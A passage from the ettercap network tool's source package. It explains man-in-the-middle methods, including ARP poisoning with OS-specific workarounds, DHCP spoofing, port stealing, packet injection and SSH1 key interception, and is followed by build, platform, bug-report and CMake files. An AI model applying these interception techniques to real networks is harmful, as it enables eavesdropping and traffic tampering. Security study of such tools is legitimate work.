192.168.0.3 HOST 2: mac: 02:02:02:02:02:02 ip: 192.168.0.2 we send arp replys to: HOST 1 telling that 192.168.0.2 is on 03:03:03:03:03:03 HOST 2 telling that 192.168.0.1 is on 03:03:03:03:03:03 now they are poisoned !! they will send their packets to us ! then if receive packets from: HOST 1 we will forward to 02:02:02:02:02:02 HOST 2 we will forward to 01:01:01:01:01:01 simple, isn't it ? *** LINUX KERNEL 2.4.x ISSUE *** In the latest release of the linux kernel we can find in : /usr/src/linux/net/ipv4/arp.c /* Unsolicited ARP is not accepted by default. It is possible, that this option should be enabled for some devices (strip is candidate) */ these kernels use a special neighbor system to prevent unsolicited arp replies (what ettercap sends to the victim). Good gracious, is ettercap unusable with that kernel ? the answer is NO ! let's view why... in the same source code we find: /* * Process entry. The idea here is we want to send a reply if it is a * request for us or if it is a request for someone else that we hold * a proxy for. We want to add an entry to our cache if it is a reply * to us or if it is a request for our address. * (The assumption for this last is that if someone is requesting our * address, they are probably intending to talk to us, so it saves time * if we cache their address. Their address is also probably not in * our cache, since ours is not in their cache.) * * Putting this another way, we only care about replies if they are to * us, in which case we add them to the cache. For requests, we care * about those for us and those for our proxies. We reply to both, * and in the case of requests for us we add the requester to the arp * cache. */ so, if the kernel receives a REQUEST it will cache the host... what does that mean ? if ettercap sends spoofed REQUESTS instead of REPLIES the kernel will cache them ? the answer is YES !! ettercap 0.6.0 and later has this new ARP REQUEST POISONING method. it will alternate request and replies on poisoning because other OS doesn't have this "feature"... *** SOLARIS ISSUE *** Solaris will not cache a reply if it isn't already in the cache. The trick is simple, before poisoning, ettercap sends a spoofed ICMP ECHO_REQUEST to the host, it has to reply on it and it will make an arp entry for the spoofed host. Then we can begin to poison as always, the entry is now in the cache... ICMP REDIRECTION This attack implements ICMP redirection. It sends a spoofed icmp redirect message to the hosts in the lan pretending to be a best route for internet. All connections to internet will be redirected to the attacker which, in turn, will forward them to the real gateway. The resulting attack is an HALF-DUPLEX mitm. Only the client is redirected, since the gateway will not accept redirect messages for a directly connected network. DHCP SPOOFING This attack implements DHCP spoofing. It pretends to be a DHCP server and try to win the race condition with the real one to force the client to accept replies from it. This way the attacker is able to manipulate the GW parameter and hijack all the outgoing traffic generated by the clients. The resulting attack is an HALF-DUPLEX mitm. PORT STEALING This technique is useful to sniff in a switched environment when ARP poisoning is not effective (for example where static mapped ARPs are used). It floods the LAN with ARP packets. The destination MAC address of each "stealing" packet is the same as the attacker's one (other NICs won't see these packets), the source MAC address will be one of the MACs of the victims. This process "steals" the switch's port of each victim. Using low delays, packets destined to "stolen" MAC addresses will be received by the attacker, winning the race condition with the real port owner. When the attacker receives packets for "stolen" hosts, it stops the flooding process and performs an ARP request for the real destination of the packet. When it receives the ARP reply it's sure that the victim has "taken back" his port, so ettercap can re-send the packet to the destination as is. Now we can re-start the flooding process waiting for new packets. CHARACTERS INJECTION We have stated that the packets are for us... And the packets will not be received by destination until we forward them. But what happens if we change them? Yes, they reach destination with our modifications. We can modify, add, delete the content of these packets, by simply recalculating the checksum and substituting them on the traffic. But we can do also more: we can insert packets in the connection. We forge our packets with the right sequence and acknowledgement number and send them to the desired host. When the next packets will pass through us we simply subtract or add the sequence number with the amount of data we have injected till the connection is alive, preventing the connection to be rejected (this until we close ettercap, who maintains sequence numbers correct, after program exit, the connection must be RESET or all future traffic would be rejected, blocking the source workstation network). NOTE: Injector supports escape sequences. you can make multi-line injection eg: "this on line one \n this on line two \n and so on..." eg: "this in hex mode: \x65\x6c\x6c\x65" eg: "this in oct mode: \101\108\108\101" NOTE: remember to terminate your injection with \r\n if you want to inject command to the server. SSH1 MAN-IN-THE-MIDDLE When the connection starts (remember that we are the master-of-packets, all packets go through ettercap) we substitute the server public key with one generated on the fly and save it in a list so we can remember that this server has been poisoned before. Then the client send the packet containing the session key ciphered with our key, so we are able to decipher it and sniff the real 3DES session key. Now we encrypt the packet with the correct server public key and forward it to the SSH daemon. The connection is established normally, but we have the session key !! Now we can decrypt all the traffic and sit down watching the stream ! The connection will remain active even if we exit from ettercap, because ettercap doesn't proxy it (like dsniff). After the exchange of the keys, ettercap is only a spectator... ;) PACKET FILTERING Like character injection, we can modify the packets payload and replace the right sequence and acknowledgement number if needed. With the integrated filtering engine you can program your own filters to make the best filter for your aims. A scripting languages is used to make filters source that must be compiled with etterfilter(8) in order to be used by ettercap. PASSIVE SCANNING OF THE LAN This feature is very useful if you want to know the topology of the lan but you don't want to send any packet on it. In this way the scan is done entirely by sniffing packets and extracting useful information from them. This scan will let you know the hosts in the lan (it watches ARP request), the Operating System of the hosts (it uses passive os fingerprint... see next section), the open ports of an host (looking the SYN+ACK packet), the gateway, the routers or hosts acting as a router (it watches ICMP messages). As a passive method it is useless on a switched lan (because it can make a topology only of the host that are connecting to you), but if you put it on a gateway and let it run for hours or days, it will make a complete report of the hosts in the lan. PASSIVE OS FINGERPRINT The main idea is to analyze the passive information coming from a host when it makes or receives connections with other hosts. This information is enough to detect the OS and the running services of the host. In this scenario, we look at SYN and SYN+ACK packet and collect some interesting info from them: Window Size: the TCP header field MSS: the TCP option Maximum Segment Size (can be present or not) TTL: the IP header field Time To Live (rounded to the next power of 2) Window Scale: the TCP option indicating the Scale SACK: the TCP option for the Selective ACK NOP: if the TCP options contain a NOP DF: the IP header field Don't Fragment TIMESTAMP: if the TCP timestamp option is enabled and obviously the type of the packet (SYN or SYN+ACK) The database contains different fingerprints for each type of packet because some OSes have different fingerprints from SYN to SYN+ACK. Obviously the SYN fingerprint is more reliable, because the SYN+ACK is influenced by the SYN (if a SYN doesn't contain a SACK the SYN+ACK will not have the SACK option even if the host support it). So while collecting information off the lan, if we receive a SYN+ACK we mark the OS of that host as temporary and when we receive a SYN we confirm that. Fingerprints ending with an ":A" are less reliable... this is because some OS identification may change during the gathering process. The SYN+ACK packets are also used to discover the open ports of a host. (see next section) The interesting thing is that firewalls, gateways and NAT are transparent to passive OS detection. So collecting info for the LAN will let you know info even for remote hosts. Only proxies aren't transparent because they make a new connection to the target. Our fingerprint database has to be enlarged, so if you find a host with an unknown fingerprint and you know for sure the OS of that host, please mail us the fingerprint and the OS, we will insert in the database. OPEN PORTS Open ports are identified by looking for SYN+ACK packets. If a SYN+ACK comes from a port, it is for sure open, except for the channel command of FTP protocol, for that reason SYN+ACK going to port 20 are not used to indicate a open port. For the udp ports the question is a little bit difficult because no SYN or ACK packet are present in the udp protocol, so ettercap assumes that a udp port < 1024 that sends packets is opened. We know that in this way we cannot discover open ports > 1024 but they can go undetected as open when a client sends packet to a server. GATEWAY AND ROUTERS The gateway is simply recognized looking at IP packet with a non local ip ( checking the netmask ). If a non local IP is found, ettercap look at the ethernet address (MAC) and store it as the gateway mac address, then it search for it in the list and mark the corresponding ip as the gateway. Looking in the ICMP messages we can rely that if a host sends a TTL-exceeded or a redirect messages it is a router or an host acting as it. ============================================================================== vim:ts=3:expandtab ettercap-0.8.3.1/README.BINARIES000664 000000 000000 00000003634 13711276346 015543 0ustar00rootroot000000 000000 ============================================================================= ============================================================================= @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@ @@@@@@@ @@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@ @@@ @@@ @@@@@@@ @@ @@@ @@@@@@@ @@ @@ @@ NG Copyright 2001-2015 The Ettercap Dev Team ============================================================================= ============================================================================= !!! I M P O R T A N T N O T I C E !!! Ettercap is distributed officially ONLY in source code. Binary packages in ANY form are NOT officially supported. Although it is not prohibited to distribute binary packages, the authors will not respond on bugs found in them. If you use one of these packages downloaded from Internet, redirect your bug report to /dev/null. The authors will reply to bug reports and will be happy to find a solution only for hand compiled executables. Every Linux distribution, but even *BSD or Windows is different from another. What is compiled on my machine may not work on yours because of a different version of a system library. To avoid this type of missing dependencies, we will not distribute any binary for any operating system. Most of the popular distributions (Debian, RedHat, FreeBSD, OpenBSD, ecc) provide the binary packages for ettercap. Use these packages, since they are build to work on your distribution and should have the dependencies resolved correctly. Refer to the binary packager of your distribution for problems regarding these packages. ============================================================================= vim:ts=3:expandtab ettercap-0.8.3.1/README.BUGS000664 000000 000000 00000007575 13711276346 015117 0ustar00rootroot000000 000000 ============================================================================== ============================================================================== @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@ @@@@@@@ @@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@ @@@ @@@ @@@@@@@ @@ @@@ @@@@@@@ @@ @@ @@ NG Copyright 2001-2013 The Ettercap Dev Team ============================================================================== ============================================================================== "Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it." - Brian W. Kernighan If you found a new bug please report it to https://github.com/Ettercap/ettercap/issues or by sending an email to ============================================================================== C O M P I L E T I M E B U G S ============================================================================== If you are not able to compile ettercap on your system, please make a bug report. In order to help you fix the problem we need the following information: 1) a description of your operating system (including any patch level) # uname -a > os.log 2) the cmake cache file # cat CMakeCache.txt 3) the entire output from 'make' # make 1> make_output 2> make_error 4) make a tarball with all the needed infos # tar pczf compile_error.tar.gz os.log \ CMakeCache.txt \ make_output \ make_error ============================================================================== R U N T I M E B U G S ============================================================================== If the bug is critical and results in a segmentation fault follow these steps to make a detailed bug report in order to help us to find the bug and fix it. 1) recompile the program in debug mode: (follow the instructions on README.GIT file in order to pull the repository and build the program in debug mode) 2) force ettercap to not drop privileges to make sure the core is dumped: # export EC_UID=0 # export EC_GID=0 3) override any limit for coredumps: # ulimit -c unlimited 4) enable memory checks (if your system supports them), so the program will abort if some heap corruption is in place: # export MALLOC_CHECK_=2 5) dump to a file the traffic that causes the crash (we need it to reproduce the situation) # ./src/ettercap -w offending_packets.pcap ... --your-options-here ... 6) analyze the core with gdb and send us the backtrace: # gdb ettercap core (gdb) bt (gdb) quit copy and paste the output of the gdb command 'bt' in a file (backtrace.log) 6a) if you don't get a core (for any reason), you can run ettercap within gdb: # gdb ettercap (gdb) r your_parameters_here when it catches the segfault, you can get the backtrace with the 'bt' command 7) collect useful information about your network: # ifconfig -a > network.txt # arp -an >> network.txt # netstat -rn >> network.txt 8) tar all the information together with the log generated by ettercap: # tar zcvf bugreport.tar.gz ettercap-*-debug.log \ offending_packets.pcap \ network.txt \ backtrace.log 9) mail the tarball to us with a brief description of the bug. ============================================================================= vim:ts=3:expandtab ettercap-0.8.3.1/README.GIT000664 000000 000000 00000003350 13711276346 014765 0ustar00rootroot000000 000000 ============================================================================= ============================================================================= @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@ @@@@@@@ @@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@ @@@ @@@ @@@@@@@ @@ @@@ @@@@@@@ @@ @@ @@ NG Copyright 2001-2015 The Ettercap Dev Team ============================================================================== H O W T O C O M P I L E F R O M G I T ============================================================================== First you have to clone the project from the git repository: # git clone git://github.com/Ettercap/ettercap.git # cd ettercap If you already had the repository cloned, you will need to pull the latest changes: # git pull After you have successfully cloned the repository then you must initiate the build with cmake: # mkdir build # cd build # cmake .. # (Use ccmake . to change options such as disabling IPv6 support, add plugins support, setting release type to Debug, etc). ============================================================================== D E V E L O P E R S A N D B E T A T E S T E R S S E C T I O N ============================================================================== In order for ettercap to be compiled with debugging symbols, you need to use ccmake to change the release type to Debug. ============================================================================== vim:ts=3:expandtab ettercap-0.8.3.1/README.LUA000664 000000 000000 00000001774 13711276346 014773 0ustar00rootroot000000 000000 EXPERIMENTAL! Requires: LuaJIT >= 2.0.0 (will use bundled LuaJIT if it isn't already installed) Building. mkdir build cd build/ cmake -DENABLE_LUA=On .. make sudo make install Example Scripts: See example scripts under src/lua/share/scripts/ or when installed under /usr/local/share/ettercap/lua/scripts/. Script Execution: Pass the script to the --lua-script parameter. More scripts can be specficied separated with comma (no spaces). ettercap [OPTIONS] --lua-script=[,,...] Script Parameters: You can pass parameters to the LUA script by passing them to the --lua-args parameter in key-value pairs. Multiple key-value pairs can be specified separated with comma (no spaces). ettercap [OPTIONS] --lua-args n1=v1,[n2=v2,...] To access these parameters in the LUA script, they're available as a table variable called SCRIPT_ARGS. So the following example access the parameter key "n1": ettercap.log("value for n1: %s", SCRIPT_ARGS["n1"]) ettercap-0.8.3.1/README.OSXLION000664 000000 000000 00000001471 13711276346 015477 0ustar00rootroot000000 000000 MiTM SSL issues with OS X Lion: ------------------------------- It is a known fact that IP Forwarding (port forwarding) does not work on OS X Lion by default. But there is a fix! Modify your /Library/Preferences/SystemConfiguration/com.apple.Boot.plist file and a tag set with the following: net.inet.ip.scopedroute=0 Your file (without any other special settings) should look like: ------ Kernel Flags net.inet.ip.scopedroute=0 ------- Reboot and enjoy MiTM SSL! Hit us up on Freenode (irc.freenode.net) channel #ettercap-project with any questions! Thanks, exfil ettercap-0.8.3.1/README.PLATFORMS000664 000000 000000 00000021115 13711276346 015710 0ustar00rootroot000000 000000 ============================================================================== ============================================================================== @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@ @@@@@@@ @@@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@ @@@ @@@ @@@@@@@ @@ @@@ @@@@@@@ @@ @@ @@ NG Copyright 2001-2015 The Ettercap Dev Team ============================================================================== P O R T I N G S T A T U S ============================================================================== SYSTEM STATUS NOTES ============================================================================== LINUX ------------------------------------------------------------------------------ Linux 3.x FULL (primary development platform) Linux 2.6.x FULL Linux 2.4.x FULL Linux 2.2.x FULL SOLARIS ------------------------------------------------------------------------------ SunOS 5.8 (sparc) FULL tested on a SunFire V100 sparc64 Solaris 8 (intel) FULL tested on SunOS solaris 5.8 (i386) *BSD ------------------------------------------------------------------------------ FreeBSD 8.x FULL tested on FreeBSD 8.3-RELEASE (amd64) FreeBSD 5.x FULL tested on FreeBSD 5.1-RELEASE (i386) FreeBSD 4.x untested OpenBSD 3.x FULL tested on OpenBSD 3.4 GENERIC#18 i386 OpenBSD 2.x untested NetBSD 1.5.x untested MAC OS X (Darwin) ------------------------------------------------------------------------------ Mac OS X FULL tested on OS X Lion and Snow Leopard (64-bit) Darwin 7.x FULL tested on darwin 7.0.0 (powerpc) Darwin 6.x untested WINDOWS (native/mingw) thanks to G. Vanem ------------------------------------------------------------------------------ Windows 2000 untested Windows XP untested Windows 2003 untested WINDOWS (cygwin) ------------------------------------------------------------------------------ Windows 2000 untested Windows XP untested ============================================================================== P L A T F O R M S P E C I F I C I S S U E ============================================================================== ------------------------------------------------------------------------------ L I N U X ------------------------------------------------------------------------------ No known issue, just be sure to have all the required components. (see README) ------------------------------------------------------------------------------ S O L A R I S ------------------------------------------------------------------------------ After installing the following packages from http://www.sunfreeware.com - libtool 1.5 (needed for libltdl) - libpcap 0.8.1 - gcc 3.3.1 - binutils 2.11.2 - make 3.80 ettercap should configure and compile without any issue. libnet 1.1.2.1 should be downloaded from http://www.packetfactory.net and compiled by your own. ------------------------------------------------------------------------------ M A C O S X ------------------------------------------------------------------------------ thanks to 'rgovostes' for this instructions. Launch FinkCommander and search for the following software. Select the appropriate files and press command-shift-i to begin installing them - it'll take a long time, don't let your machine fall asleep. There may be additional packages which you should install, such as ones with -dev or -shlibs extensions. There may be multiple versions of the software available - if in doubt, go with the latest copy. bison >= 1.875-1 dlcompat >= 20030629-15 libnet >= 1.1.2.1-1 libpcap >= 0.8.1-1 libpoll >= 1.4-11 libtool >= 1.5-1 ncurses >= 5.3-20031018-2 openssl >= 0.9.7c-3 pcre >= 4.3-1 pkgconfig >= 0.15.0-2 ------------------------------------------------------------------------------ B S D ------------------------------------------------------------------------------ + FREEBSD In order to have plugins support you have to install the following package: - libltdl (part of libtool 1.5) all the other libs can be installed from ports (except for libnet 1.1.2.1, at the moment) if you encounter some linking problem compiling the tarball, it is due to the libtool version provided within our tarball. to solve the problem re-libtoolize the package and recompile it or download the cvs version and run the autogen.sh script. on some BSD configurations, even after installing the libtool and libltdl ports, lt_dlopen might not be found by the configure script. To solve this, install the libpcap port from /usr/ports/net and run configure this way: CFLAGS="-I /usr/local/include" LDFLAGS="-L /usr/local/lib" ./configure .... + OPENBSD Same recommendations as for FreeBSD, but you have to find a way to install libltdl since it seems that newer version of libtool aren't in the ports collection. Furthermode OpenBSD requires libpcap 0.8.3 since it fixed a segfault in pcap_findalldevs(); probably you will have to append the --with-iconv=/usr/local to the configure command line. ------------------------------------------------------------------------------ W I N D O W S ------------------------------------------------------------------------------ + MINGW / MSYS (suggested) 1) download the wpdpack from the winpcap website - install the drivers (version >= 3.1 beta) 2) download the libnet tarball from packetfactory.net apply this patch: http://ettercap.sf.net/devel/libnet-1.1.2.1-mingw.tar.gz 3) download pthreads from: ftp://sources.redhat.com/pub/pthreads-win32 4) download all the other required library from: http://gnuwin32.sourceforge.net/packages.html - openssl - libgw32c - libz - libregex - libiconv 5) download the gtk development and runtime packages from: http://www.gimp.org/~tml/gimp/win32/downloads.html 4) unpak all the packages as shown in the following tree: . |-> ettercap |-> gtk |-> gw32c |-> libiconv |-> libnet |-> openssl |-> pthreads |-> regex |-> winpcap |-> zlib make sure each directory contains an 'include' dir with the .h files and a 'lib' directory with the .a/.dll files. 5) enter the ettercap directory and execute the configure script 6) issue the 'make' command and have fun :) 7) ettercap/include/ec_os_mingw.h might need to be modified to not declare struct timezone as it is already defined in sys/time.h on latest MinGW version. *) probably you'll have some difficulties compiling it. you have to modify the makefile a bit to suite your environment. don't forget to install all the required .dll since the .dll.a are only wrapper to the real .dll file. *) if make fails because of a /man/man5 or /man/man8 directory does not exist, keep running make until compilation is done *) after everything is done type: a) cd .. b) /usr/bin/find . -name \*.dll -exec cp {} ettercap/lib \; c) cd ettercap d) cp ettercap.exe lib e) run ettercap from lib if you want precompiled packages: http://sourceforge.net/project/showfiles.php?group_id=17435 + CYGWIN (deprecated) 1) download the wpdpack from the winpcap website - install the drivers (version >= 3.1 beta) 2) download the libnet tarball from packetfactory.net 3) copy the libs in Wpdpack/lib into /usr/lib copy the includes in Wpdpack/include into /usr/include/pcap rename the /usr/include/pcap/pthread.h to /usr/include/pcap/_pthread.h 4) compile the libnet source... you have to search in the mailing list for the patch for cygwin. this is the hardest part... since libnet porting to cygwin is not fully working... my bad :( 5) run the ettercap cmake 6) issue the 'make' command and have fun ============================================================================== vim:ts=3:expandtab ettercap-0.8.3.1/README.TESTS000664 000000 000000 00000000440 13711276346 015241 0ustar00rootroot000000 000000 Ettercap now has unit-tests! Requires: check (will use bundled check if it isn't already installed) available at http://check.sourceforge.net/ - To enable tests: - mkdir build - cd build - cmake -DENABLE_TESTS=On .. - make && make test OR - make && make test_verbose ettercap-0.8.3.1/SECURITY.md000664 000000 000000 00000001130 13711276346 015246 0ustar00rootroot000000 000000 # Security Policy ## Supported Versions Use this section to tell people about which versions of your project are currently being supported with security updates. | Version | Supported | | ------- | ------------------ | | 0.8.3 | :white_check_mark: | | 0.8.2 | :x: | | 0.8.1 | :white_check_mark: | | < 0.8 | :x: | ## Reporting a Vulnerability Please report all security vulnerabilities to info@ettercap-project.org. For general chatter, please register to our mailing list: https://lists.ettercap-project.org/cgi-bin/mailman/listinfo/ettercap-users ettercap-0.8.3.1/THANKS000664 000000 000000 00000016521 13711276346 014402 0ustar00rootroot000000 000000 ------------------------------------------------ People who helped us developing ettercap 0.7.4+ ------------------------------------------------ Antonio Collarino (sniper) for core and plugin development, testing and bug fixes Gianfranco Costamagna (LocutusOfBorg) for bug fixes and code contributions Eric Milam (J0hnnyBrav0) for modifying documentation, man pages, oversight, support, etc! Mike Ryan (justfalter) For the LUA integration (coming soon!) Ryan Linn (susorr) For the LUA integration (coming soon!) Dhiru Kholia (kholia) For the O5Logon, ISCSI CHAP, MySQL5, VNC packet parsing dissectors Others: halfie For bug reports and testing Agostino Sarubbo Gentoo Maintainer, for bug reports and testing Shoham Peller For issue bug fix #84 Barak A. Pearlmutter For the debian packaging and the TONS of pull requests of bug fix :) I'm sure there are a lot of more people (unmamed), but to everyone... THANKS! ---------------------------------------------- People who helped us developing ettercap NG ---------------------------------------------- Gigi Sullivan for hours of discussion on ettercap internals and for giving me the ideas for the new plugins engine and for some data structures that helped me to speed up the whole process... BIG THANKS !! Mathieu Masseboeuf for the invaluable effort in the Mac OS X porting G. Vanem for the native win32 porting for many other patches Will Jenkins for testing under Mac OS X Claudio Agosti for the idea of DNS passive queries Michele De Martin has provided me a token ring dump Iceman for the fixes to the man pages rgovostes for the redir_command for Mac Os X bartocc hack101 Hex for the redir_command for Open BSD Crizack Johannes Bauer for the prism2 dump Massimo Chiodini for the help in portstealing mitm method Jon Oberheide for gcc 3.5 fixes Kev for the invaluable effort to the ettercap forum for many of the site FAQ --------------------------------------- Copyrighted part of code or stuff... --------------------------------------- Fyodor for the services database Michal Zalewski for some passive os fingerprint (form p0f) Subterrain Security Group for some passive os fingerprint (from siphon) Nicola Bonelli for the TTL_PREDICTOR function Dug Song for hex.c (part of dsniff source) from which I took the hex_print function. OpenSSH team for the match_pattern function The Apache group for the base64_decode function (took from ap_base64.c) Ethereal team for the in_cksum_shouldbe function if you think you should be in the list, please mail me. ============================================================================== ---------------------------------------------------------- People who helped us developing ettercap (old versions) ---------------------------------------------------------- Max3232 for cleaning up makefile, specfile et similia... Gigi Sullivan for beta testing with glibc 2.0.x Lorenzo Porro (LnZ) for beta testing on Linux 2.0.36 Raptor for the help in the port on OpenBSD 2.7 VOODOO Nicola Bonelli for the help porting plugins to OpenBSD George Reid FreeBSD ports maintainer Murat Demirten Debian package maintainer Alter Eric for a patch in the Makefile.in dealing with ($LIBS) Niilo Kajander has provided me a NetBSD shell... Lee Hobart has provided me a MacOsX root shell... wow ! Paulo Madeira has coded the arpcop plugin Cristian Ionescu-Idbohrn for pointing out some configure 'not configurable' stuff and providing me the idea for tune up the configure script Georg Hofstetter for the HL-RCON dissector and for the TEXT only view in the data sniffing window Giorgio Zoppi for some security patch of the code A_D has provided me a MacOsX root shell... wow ! downtime for helping me with the plugin problem on Mac OS X Dax Kelson has provided me a Solaris root shell... yeah ! CAT Slackware package maintainer tavi for the Windows 9x porting Carlo Perassi for reviewing the plugin documentation Garph0 plugin porting for windows -------------------------------------------- Documentation Translators -------------------------------------------- Francisco Peralta Aguaron (10t8or) for the initial documentation. vacuum for fixing the grammar in the documentation :) Julien Bordet for the french translation of the documentation Matteo Carlo Sala (Ares) for the italian translation Joker for the polish translation Log C for the indonesian translation Roxann Voss for the dutch translation Rick Farina for the patch to my horrible english :) --------------------------------------------- Betatesting Team (only the active one)... --------------------------------------------- Crusher 4 Downtime Drygol Angel Georgiev great job guy ! Martin Nenov a very big thanks to him !! ;) Paulo Madeira your plugin rocks ! Rick Farina many thanks to you my friends ! Java JVM very big thanks!!!! ettercap-0.8.3.1/TODO000664 000000 000000 00000005533 13711276346 014160 0ustar00rootroot000000 000000 ========================== TODO for the NG series ========================== >>> things to be fixed + remove GBL_OPTIONS->quiet from some plugins + PCAP RELATED - pcap_stat fix (even under linux the stats are cumulative) + libnet_write under windows http://ettercap.sourceforge.net/forum/viewtopic.php?p=13789#13789 ============================ In the next release(s) ============================ + Host impersonation (issue #31) + RDP MITM feature (issue #32) + ETTERLOG - reassemble the stream based on sequence numbers - extractors for HTTP, POP, SMTP, FTP, TFTP + resolve ip in the message window + use different counters for RX and TX bytes in the connection table + record the MSS for the packet splitting + multiple dissector on a single port + CURSES - modifiable text in widgets + NETWORK MAPPER - automatic scan (all the host in the profile list) - specified ip address - interconnections map (linked to the profiles) - based on ttl (ala traceroute) - png output (ala nagios) + BINDER + ETTERFILTER - possibility to set flags in scripts - per packet - per connection ??? + SSH - SSL - decryption with given keys - DES support + ETTER.FINGER.MAC Allow Ettercap to use oui.txt as downloaded, instead of etter.finger.mac. Discussion: https://github.com/Ettercap/ettercap/pull/840 - change the code to use the standard oui.txt, and; - use the system one when available. See: https://packages.debian.org/sid/all/ieee-data/filelist https://lintian.debian.org/tags/source-contains-data-from-ieee-data-oui-db.html ================== LONG TERM TODO ================== + GTK - Phase out GTK2 - externalize XML code to own resouce files - transform static widgets to GtkBuilder XML files + SSH2 dissection :) (yes, it can be done) + IPv6 - router discovery - DHCPv6 MITM + Rendevouz mitm + SOCKS - decode the internal connection + multiple interfaces on gateway + NEW DISSECTOR - TACACS dissector - Microsoft RPC - postgresql - pcanywhere - TDS - MS-SQL (http://www.nii.co.in/vuln/sqlpass.html) - YMSG (http://www.xi0n.com/forums/showthread.php?s=8dc997a1e1f0d3216c8956d64fcdb414&postid=2767#post2767 http://www.venkydude.com/articles/yahoo.htm) - RDesktop - MSN9 (http://www.hackerscenter.com/Articles/Article.asp?id=54) + INET - handle fragmented packets + LUA BINDINGS - There's a lot to take care of.Too much to relate here. See: https://github.com/Ettercap/ettercap/pull/858 https://github.com/Ettercap/ettercap/pull/869 and https://github.com/Ettercap/ettercap/pull/698 ================== FOR NOW ================= ettercap-0.8.3.1/TODO.TESTING000664 000000 000000 00000000415 13711276346 015266 0ustar00rootroot000000 000000 ================================= THINGS THAT NEED TO BE TESTED ================================= + WIFI - test the decoder with adapters other than cisco aironet + Core - Check the checksumming code as it reports invalid checksum on some packets ettercap-0.8.3.1/cmake/000775 000000 000000 00000000000 13711276346 014542 5ustar00rootroot000000 000000 ettercap-0.8.3.1/cmake/Modules/000775 000000 000000 00000000000 13711276346 016152 5ustar00rootroot000000 000000 ettercap-0.8.3.1/cmake/Modules/CheckVariableInHeaders.cmake000664 000000 000000 00000001426 13711276346 023425 0ustar00rootroot000000 000000 include(CheckCSourceCompiles) macro(CHECK_VARIABLE_IN_HEADERS _SYMBOL _HEADER _RESULT) set(_INCLUDE_FILES) foreach(it ${_HEADER}) set(_INCLUDE_FILES "${_INCLUDE_FILES}#include <${it}>\n") endforeach() set(_CHECK_PROTO_EXISTS_SOURCE_CODE " ${_INCLUDE_FILES} void cmakeRequireSymbol(int dummy,...){(void)dummy;} int main() { int i = ${_SYMBOL}; return 0; } ") check_c_source_compiles("${_CHECK_PROTO_EXISTS_SOURCE_CODE}" ${_RESULT}) if(${_RESULT}) file(APPEND ${CMAKE_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/CMakeOutput.log "Variable ${_SYMBOL} was found in headers\n") else() file(APPEND ${CMAKE_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/CMakeError.log "Failed to find variable ${_SYMBOL}. Source: ${_CHECK_PROTO_EXISTS_SOURCE_CODE}\n") endif() endmacro() ettercap-0.8.3.1/cmake/Modules/EttercapHeadersCheck.cmake000664 000000 000000 00000001020 13711276346 023146 0ustar00rootroot000000 000000 include(CheckIncludeFile) check_include_file(sys/poll.h HAVE_SYS_POLL_H) check_include_file(sys/select.h HAVE_SYS_SELECT_H) check_include_file(sys/utsname.h HAVE_UTSNAME_H) check_include_file(stdint.h HAVE_STDINT_H) check_include_file(getopt.h HAVE_GETOPT_H) check_include_file(ctype.h HAVE_CTYPE_H) check_include_file(inttypes.h HAVE_INTTYPES_H) check_include_file(arpa/nameser.h HAVE_ARPA_NAMESER_H) check_include_file(ltdl.h HAVE_LTDL_H) check_include_file(dlfcn.h HAVE_DLFCN_H) check_include_file(libgen.h HAVE_LIBGEN_H)ettercap-0.8.3.1/cmake/Modules/EttercapLibCheck.cmake000664 000000 000000 00000021403 13711276346 022310 0ustar00rootroot000000 000000 ## The easy part set(EC_LIBS) set(EC_INTERFACES_LIBS) set(EC_INCLUDE) # Generic target that will build all enabled bundled libs. add_custom_target(bundled) if(ENABLE_CURSES) set(CURSES_NEED_NCURSES TRUE) find_package(Curses REQUIRED) set(HAVE_NCURSES 1) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${CURSES_LIBRARIES} ${CURSES_NCURSES_LIBRARY} ${CURSES_FORM_LIBRARY}) set(EC_INCLUDE ${EC_INCLUDE} ${CURSES_INCLUDE_DIR} ${CURSES_INCLUDE_DIR}/ncurses) find_library(FOUND_PANEL panel) find_library(FOUND_MENU menu) if(FOUND_PANEL) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${FOUND_PANEL}) endif() if(FOUND_MENU) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${FOUND_MENU}) endif() endif() if(ENABLE_GTK) set(VALID_GTK_TYPES GTK2 GTK3) if(NOT DEFINED GTK_BUILD_TYPE) message(STATUS "No GTK_BUILD_TYPE defined, default is GTK3") set(GTK_BUILD_TYPE GTK3 CACHE STRING "Choose the type of gtk build, options are: ${VALID_GTK_TYPES}." FORCE) else() set(GTK_BUILD_TYPE ${GTK_BUILD_TYPE} CACHE STRING "Choose the type of gtk build, options are: ${VALID_GTK_TYPES}." FORCE) endif() list(FIND VALID_GTK_TYPES ${GTK_BUILD_TYPE} contains_valid) if(contains_valid EQUAL -1) message(FATAL_ERROR "Unknown GTK_BUILD_TYPE: '${GTK_BUILD_TYPE}'. Valid options are: ${VALID_GTK_TYPES}") endif() unset(contains_valid) if(GTK_BUILD_TYPE STREQUAL GTK3) set(GTK3_FIND_VERSION 1) 